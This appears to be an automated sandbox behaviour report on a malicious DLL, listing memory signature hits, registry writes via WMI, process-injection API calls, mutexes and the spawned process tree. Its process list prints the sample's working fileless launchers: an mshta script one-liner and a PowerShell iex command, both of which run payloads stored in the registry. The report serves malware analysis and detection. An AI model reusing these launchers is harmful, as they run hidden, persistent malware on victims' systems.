Source: Yara match	File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Source: C:\Windows\SysWOW64\rundll32.exe

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD812CE NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD81E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD8192C NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD82495 NtQueryVirtualMemory,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031433A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03140A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03136A33 NtQueryInformationProcess,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031351A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031268EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03124F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313A680 NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03134D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031425B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03123C5B NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0314133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031403BD NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03128936 memset,NtQueryInformationProcess,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031309C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313E543 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D91ADF GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D925E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D94F6E NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D98055 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05374D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05364F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053751A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053668EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053833A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05376A33 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05380A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537E543 NtGetContextThread,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05368936 memset,NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537790F NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053709C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0538133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053803BD NtQuerySystemInformation,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536CBA7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
Source: C:\Windows\System32\control.exe	Code function: 30_2_002679DC NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024C29C NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 30_2_002566D4 NtSetInformationProcess,CreateRemoteThread,
Source: C:\Windows\System32\control.exe	Code function: 30_2_0027F004 NtProtectVirtualMemory,NtProtectVirtualMemory,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_03125195 CreateProcessAsUserW,

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DD82274
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312B2A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312EAFA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_031298A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312D8E5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03122F9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03130F82
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313DE9A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313ED58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0313F4BE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03141CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D96680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D97E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00D9175B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537ED58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537F4BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05381CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05362F9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05370F82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0537DE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053698A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536D8E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536B2A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_053852A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536EAFA
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025D958
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026832C
Source: C:\Windows\System32\control.exe	Code function: 30_2_00245814
Source: C:\Windows\System32\control.exe	Code function: 30_2_00263858
Source: C:\Windows\System32\control.exe	Code function: 30_2_00245080
Source: C:\Windows\System32\control.exe	Code function: 30_2_002490FC
Source: C:\Windows\System32\control.exe	Code function: 30_2_002430FC
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024A8C4
Source: C:\Windows\System32\control.exe	Code function: 30_2_002558DC
Source: C:\Windows\System32\control.exe	Code function: 30_2_00265110
Source: C:\Windows\System32\control.exe	Code function: 30_2_002569AC
Source: C:\Windows\System32\control.exe	Code function: 30_2_00266A38
Source: C:\Windows\System32\control.exe	Code function: 30_2_00255210
Source: C:\Windows\System32\control.exe	Code function: 30_2_00266268
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024624C
Source: C:\Windows\System32\control.exe	Code function: 30_2_00248254
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025625C
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026A280
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026CAF4
Source: C:\Windows\System32\control.exe	Code function: 30_2_00243B24
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026BB54
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024C3B4
Source: C:\Windows\System32\control.exe	Code function: 30_2_00263B8E
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024BB94
Source: C:\Windows\System32\control.exe	Code function: 30_2_00253BE0
Source: C:\Windows\System32\control.exe	Code function: 30_2_00255C24
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026A470
Source: C:\Windows\System32\control.exe	Code function: 30_2_00241C78
Source: C:\Windows\System32\control.exe	Code function: 30_2_00249CD0
Source: C:\Windows\System32\control.exe	Code function: 30_2_00267524
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024ED6C
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025CD6C
Source: C:\Windows\System32\control.exe	Code function: 30_2_00260D44
Source: C:\Windows\System32\control.exe	Code function: 30_2_00247D48
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025F598
Source: C:\Windows\System32\control.exe	Code function: 30_2_002425E8
Source: C:\Windows\System32\control.exe	Code function: 30_2_002575F8
Source: C:\Windows\System32\control.exe	Code function: 30_2_00266E34
Source: C:\Windows\System32\control.exe	Code function: 30_2_00265E3C
Source: C:\Windows\System32\control.exe	Code function: 30_2_0024FEE4
Source: C:\Windows\System32\control.exe	Code function: 30_2_00250EF4
Source: C:\Windows\System32\control.exe	Code function: 30_2_0026A6C8
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025AF34
Source: C:\Windows\System32\control.exe	Code function: 30_2_00257F68
Source: C:\Windows\System32\control.exe	Code function: 30_2_0025EF74
Source: C:\Windows\System32\control.exe	Code function: 30_2_00244744

Source: fedhsvoj.dll.29.dr	Static PE information: No import functions for PE file found
Source: jqkof1ka.dll.32.dr	Static PE information: No import functions for PE file found
Source: vbpfsg54.dll.36.dr	Static PE information: No import functions for PE file found
Source: senxb4p4.dll.23.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: worVoBJYGD.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal100.troj.evad.winDLL@41/36@9/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0313D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20210803

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6256731B-5962-E467-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{767DCAC1-5D56-1864-970A-E1CCBBDEA5C0}
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{523EEBAD-89C9-54C5-A3A6-CDC8873A517C}
Source: C:\Windows\System32\loaddll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0A0A9822-E171-CC61-BBDE-A5C01FF2A9F4}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{DA77943D-71E5-1CA0-CBAE-35102FC23944}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w25flno.lby.ps1

Jump to behavior

Source: worVoBJYGD.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Chartthird
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Heavybaby
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\worVoBJYGD.dll,Right
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
